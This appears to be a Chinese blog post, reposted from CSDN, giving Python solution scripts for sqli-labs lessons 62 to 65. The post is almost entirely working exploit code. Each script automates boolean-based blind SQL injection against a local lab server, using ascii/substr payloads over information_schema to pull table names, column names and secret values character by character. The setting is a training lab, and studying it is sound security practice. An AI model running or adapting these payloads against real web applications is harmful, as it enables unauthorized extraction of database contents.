数据库
首页 > 数据库> > sqli-labs(Less62-65)布尔类型脚本

sqli-labs(Less62-65)布尔类型脚本

作者:互联网


前言

运行前需要下载requestslxml包,修改url和referer的参数值,改index.php$times= 13000,重置一下challenges数据库。

Less-62

import requests
from lxml import etree

"""
Less-62布尔类型爆破脚本
改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载
原理是按照payload循环字典,根据响应的长度,判断正确答案
"""

url = 'http://192.168.31.242/sqli-labs/Less-62/'
headers = {'referer':'http://192.168.31.242/sqli-labs/Less-62/',
           'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9
request_times = 0
alltb_payload = """') or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """') or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """') or ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""

def same(payload,*params):
    global request_times
    oneword_index = 1
    tb_word = ""    
    while True:
        for i in list_range:
            # group_concat把所有表名写到一个记录里
            payload3 = payload_key+payload.format(*params,oneword_index,i)
            a = requests.get(url+payload3,headers=headers)
            request_times += 1
            html = etree.HTML(a.text)
            tip = html.xpath("//font[@color='#00FFFF']/text()")
            if  len(tip) != 0:
                oneword = chr(i)
                tb_word += oneword        
                break
        else:
            break
        oneword_index += 1
    return tb_word


def main():
    sel_db = 'challenges'
    all_tb = same(alltb_payload,sel_db)
    print(sel_db+"库里的表:"+all_tb)
    print('-'*100)
    sel_tb = all_tb
    all_col = same(allcol_payload,sel_db,sel_tb)
    print(sel_tb+'表里的字段:'+all_col)
    print('-'*100)
    key = all_col.split(',')[2]
    sel_col = key
    all_values = same(allvalue_payload,sel_col,sel_db,sel_tb)
    print(sel_col+'的值:'+all_values)
    print('-'*100)
    print('一共请求了'+str(request_times)+'次')



if __name__ == '__main__':
    main()

Less-63

import requests
from lxml import etree

"""
Less-63布尔类型爆破脚本
改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载
原理是按照payload循环字典,根据响应的长度,判断正确答案
"""

url = 'http://192.168.31.242/sqli-labs/Less-63/'
headers = {'referer':'http://192.168.31.242/sqli-labs/Less-63/',
           'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9
request_times = 0
alltb_payload = """' or (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """' or ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """' or ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""

def same(payload,*params):
    global request_times
    oneword_index = 1
    tb_word = ""    
    while True:
        for i in list_range:
            # group_concat把所有表名写到一个记录里
            payload3 = payload_key+payload.format(*params,oneword_index,i)
            a = requests.get(url+payload3,headers=headers)
            request_times += 1
            html = etree.HTML(a.text)
            tip = html.xpath("//font[@color='#00FFFF']/text()")
            if  len(tip) != 0:
                oneword = chr(i)
                tb_word += oneword        
                break
        else:
            break
        oneword_index += 1
    return tb_word


def main():
    sel_db = 'challenges'
    all_tb = same(alltb_payload,sel_db)
    print(sel_db+"库里的表:"+all_tb)
    print('-'*100)
    sel_tb = all_tb
    all_col = same(allcol_payload,sel_db,sel_tb)
    print(sel_tb+'表里的字段:'+all_col)
    print('-'*100)
    key = all_col.split(',')[2]
    sel_col = key
    all_values = same(allvalue_payload,sel_col,sel_db,sel_tb)
    print(sel_col+'的值:'+all_values)
    print('-'*100)
    print('一共请求了'+str(request_times)+'次')



if __name__ == '__main__':
    main()

Less-64

import requests
from lxml import etree

"""
Less-64布尔类型爆破脚本
改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载
原理是按照payload循环字典,根据响应的长度,判断正确答案
"""

url = 'http://192.168.31.242/sqli-labs/Less-64/'
headers = {'referer':'http://192.168.31.242/sqli-labs/Less-64/',
           'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9
request_times = 0
alltb_payload = """1)) and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """1)) and ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """1)) and ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""

def same(payload,*params):
    global request_times
    oneword_index = 1
    tb_word = ""    
    while True:
        for i in list_range:
            # group_concat把所有表名写到一个记录里
            payload3 = payload_key+payload.format(*params,oneword_index,i)
            a = requests.get(url+payload3,headers=headers)
            request_times += 1
            html = etree.HTML(a.text)
            tip = html.xpath("//font[@color='#00FFFF']/text()")
            if  len(tip) != 0:
                oneword = chr(i)
                tb_word += oneword        
                break
        else:
            break
        oneword_index += 1
    return tb_word


def main():
    sel_db = 'challenges'
    all_tb = same(alltb_payload,sel_db)
    print(sel_db+"库里的表:"+all_tb)
    print('-'*100)
    sel_tb = all_tb
    all_col = same(allcol_payload,sel_db,sel_tb)
    print(sel_tb+'表里的字段:'+all_col)
    print('-'*100)
    key = all_col.split(',')[2]
    sel_col = key
    all_values = same(allvalue_payload,sel_col,sel_db,sel_tb)
    print(sel_col+'的值:'+all_values)
    print('-'*100)
    print('一共请求了'+str(request_times)+'次')



if __name__ == '__main__':
    main()

Less-65

import requests
from lxml import etree

"""
Less-65布尔类型爆破脚本
改源码$times= 13000,重置一下challenges数据库,然后启动程序,包没下先pip下载
原理是按照payload循环字典,根据响应的长度,判断正确答案
"""

url = 'http://192.168.31.242/sqli-labs/Less-65/'
headers = {'referer':'http://192.168.31.242/sqli-labs/Less-65/',
           'cookie':'challenge=123; PHPSESSID=dc2akh4kagv4jqvc1f78'}
payload_key = "?id="
list_range = list(range(97,123))+[95]+[44]+list(range(65,91))+list(range(48,58)) #匹配a-z _ A-Z , 0-9
request_times = 0
alltb_payload = """1") and (ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema="{}"),{},1)))={}%23"""
allcol_payload = """1") and ascii(substr((select group_concat(column_name)from information_schema.columns where table_schema="{}" and table_name="{}" ),{},1))={}%23"""
allvalue_payload = """1") and ascii(substr((select group_concat({})from {}.{}),{},1))={}%23"""

def same(payload,*params):
    global request_times
    oneword_index = 1
    tb_word = ""    
    while True:
        for i in list_range:
            # group_concat把所有表名写到一个记录里
            payload3 = payload_key+payload.format(*params,oneword_index,i)
            a = requests.get(url+payload3,headers=headers)
            request_times += 1
            html = etree.HTML(a.text)
            tip = html.xpath("//font[@color='#00FFFF']/text()")
            if  len(tip) != 0:
                oneword = chr(i)
                tb_word += oneword        
                break
        else:
            break
        oneword_index += 1
    return tb_word


def main():
    sel_db = 'challenges'
    all_tb = same(alltb_payload,sel_db)
    print(sel_db+"库里的表:"+all_tb)
    print('-'*100)
    sel_tb = all_tb
    all_col = same(allcol_payload,sel_db,sel_tb)
    print(sel_tb+'表里的字段:'+all_col)
    print('-'*100)
    key = all_col.split(',')[2]
    sel_col = key
    all_values = same(allvalue_payload,sel_col,sel_db,sel_tb)
    print(sel_col+'的值:'+all_values)
    print('-'*100)
    print('一共请求了'+str(request_times)+'次')



if __name__ == '__main__':
    main()

标签:Less62,col,labs,sqli,print,sel,tb,payload,times
来源: https://blog.csdn.net/weixin_43623271/article/details/122801470